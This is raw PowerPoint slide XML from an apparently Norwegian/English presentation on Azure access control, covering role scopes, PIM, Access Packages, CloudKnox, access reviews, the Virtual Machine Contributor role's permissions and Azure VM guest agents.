              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E0C3CC2-AAC5-44A6-BD50-A4C39D5DCD08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2578740" y="1980104"/>
            <a:ext cx="427597" cy="756518"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Arrow: Right 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C7E3CE4-3B25-4275-B5A6-64F0ACCC9FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7137583" y="3723382"/>
            <a:ext cx="1138066" cy="552587"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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E7E6E6">
                  <a:lumMod val="2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0675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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1503613" y="212749"/>
            <a:ext cx="955165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4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Access</a:t>
            </a:r>
            <a:endPar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Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC413AF-CB46-41C3-A839-24555265043F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574529" y="488951"/>
            <a:ext cx="4102437" cy="6000213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Access is managed against Azure Resource Providers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Operations include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Read/write/action/delete/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Access can be defined on different levels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Management Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Subscription</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Resource Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Ressurs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Remember Global Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t> User Access Administrator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>PIM, Access Packages or CloudKnox for elevation of access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69897D5B-0DBA-498B-9ABD-138C1D9D7BE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4064000" y="241300"/>
            <a:ext cx="11106150" cy="62478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roleName</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0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"Virtual Machine Contributor"</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"actions"</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Microsoft.Authorization</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/*/read"</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Microsoft.Compute</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availabilitySets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Microsoft.Compute</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/locations/*"</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Microsoft.Compute</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virtualMachines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Microsoft.Compute</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/disks/write"</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Microsoft.Compute</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/disks/delete"</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Microsoft.DevTestLab</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/schedules/*"</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Microsoft.Insights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alertRules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Microsoft.Network</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applicationGateways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backendAddressPools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/join/action"</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Microsoft.Network</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loadBalancers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backendAddressPools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/join/action"</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Microsoft.Network</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loadBalancers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inboundNatPools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/join/action"</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Microsoft.Network</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loadBalancers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inboundNatRules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/join/action"</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Microsoft.Network</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loadBalancers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/probes/join/action"</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Microsoft.Network</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loadBalancers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/read"</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Microsoft.Network</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/locations/*"</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Microsoft.Network</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networkInterfaces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Microsoft.Network</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networkSecurityGroups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/join/action"</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Microsoft.Network</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networkSecurityGroups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/read"</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Microsoft.Network</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publicIPAddresses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/join/action"</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Microsoft.Network</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publicIPAddresses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/read"</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Microsoft.Network</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virtualNetworks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/read"</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Microsoft.Network</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virtualNetworks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/subnets/join/action"</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Microsoft.RecoveryServices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/locations/*"</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Microsoft.RecoveryServices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/Vaults/</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backupFabrics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backupProtectionIntent</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/write"</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Microsoft.RecoveryServices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/Vaults/</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backupFabrics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protectionContainers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protectedItems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/*/read"</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Microsoft.RecoveryServices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/Vaults/</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backupFabrics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protectionContainers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protectedItems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/read"</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Microsoft.RecoveryServices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/Vaults/</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backupFabrics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protectionContainers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protectedItems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/write"</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Microsoft.RecoveryServices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/Vaults/</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backupPolicies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/read"</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Microsoft.RecoveryServices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/Vaults/</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backupPolicies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/write"</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Microsoft.RecoveryServices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/Vaults/write"</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Microsoft.ResourceHealth</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availabilityStatuses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/read"</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Microsoft.Resources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/deployments/*"</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Microsoft.Resources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/subscriptions/</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resourceGroups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/read"</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Microsoft.SerialConsole</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serialPorts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/connect/action"</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Microsoft.SqlVirtualMachine</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Microsoft.Storage</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storageAccounts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listKeys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/action"</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Microsoft.Storage</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storageAccounts</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/read"</a:t>
            </a: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Microsoft.Support</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="10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endParaRPr kumimoji="0" lang="en-US" sz="10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897687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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4782219" y="248844"/>
            <a:ext cx="955165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4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Access </a:t>
            </a:r>
            <a:endPar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Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC413AF-CB46-41C3-A839-24555265043F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618370" y="270793"/>
            <a:ext cx="4057629" cy="5610859"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Permissions should only be temporary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Can also make custom Azure Roles using JSON based template</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Access over a longer period should be handled using Access Review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t>Does user still require access after two months? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Group based access please</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle: Rounded Corners 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E5BB240-91DC-4C51-B81D-E6379EC8833F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5933732" y="1131488"/>
            <a:ext cx="4986441" cy="1322262"/>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rPr>
              <a:t>Access Packages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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SharePoint Sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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Azure AD Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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Azure AD Grupper og Teams</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="14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7428C1CD-A54E-4775-AF2F-EEE9F372D5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941407" y="2790346"/>
            <a:ext cx="4986441" cy="1235645"/>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rPr>
              <a:t>Privileged Identity Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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Azure AD Roller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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Azure Resource Manager Roller (Custom Roles)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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Kan defineres på ulike scope (Ressurs gruppe, Sub, MG)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="14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9" name="Rectangle: Rounded Corners 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8825BCBB-0B29-42C2-82DB-2D18F2E5F0E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949082" y="4324213"/>
            <a:ext cx="4986441" cy="1274020"/>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rPr>
              <a:t>CloudKnox</a:t>
            </a:r>
            <a:r>
              <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b-NO" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kommer snart..ja veldig snart</a:t>
            </a:r>
            <a:r>
              <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85750" marR="0" lvl="0" indent="-285750" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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Azure Resource Manager (Provider Tilganger)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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Basert på historisk tilganger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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Andre skyleverandører</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="14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8D0B6CA3-E383-4CE8-BF28-9354E2271EE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4781307" y="2753111"/>
            <a:ext cx="7354326" cy="2867425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157478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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091156" y="302652"/>
            <a:ext cx="955165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4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Agents for virtual machines</a:t>
            </a:r>
            <a:endPar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Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC413AF-CB46-41C3-A839-24555265043F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511534" y="994335"/>
            <a:ext cx="4102437" cy="5601310"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>To guest agents by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Provisioning Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Windows Guest Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>PA Agent needs to be installed to properly start VM. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Doomsday – 13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Oktober</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Windows Guest Agent used for many different features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>DNS lookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Extension installation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Snapshot backup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="265113" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Runs as local system on machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Extensions collected from Azure Blob Storage via 168.63.129.16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8FCEC4-4B83-45D9-A048-34AAD7901440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5657439" y="1266710"/>
            <a:ext cx="5506157" cy="3078245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CEB7508-C7AD-4791-8923-F538788E3118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5378419" y="4530871"/>
            <a:ext cx="6295544"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0101FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0101FD"/>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srgbClr val="0101FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0101FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> extension set </a:t>
            </a:r>
            <a:r>
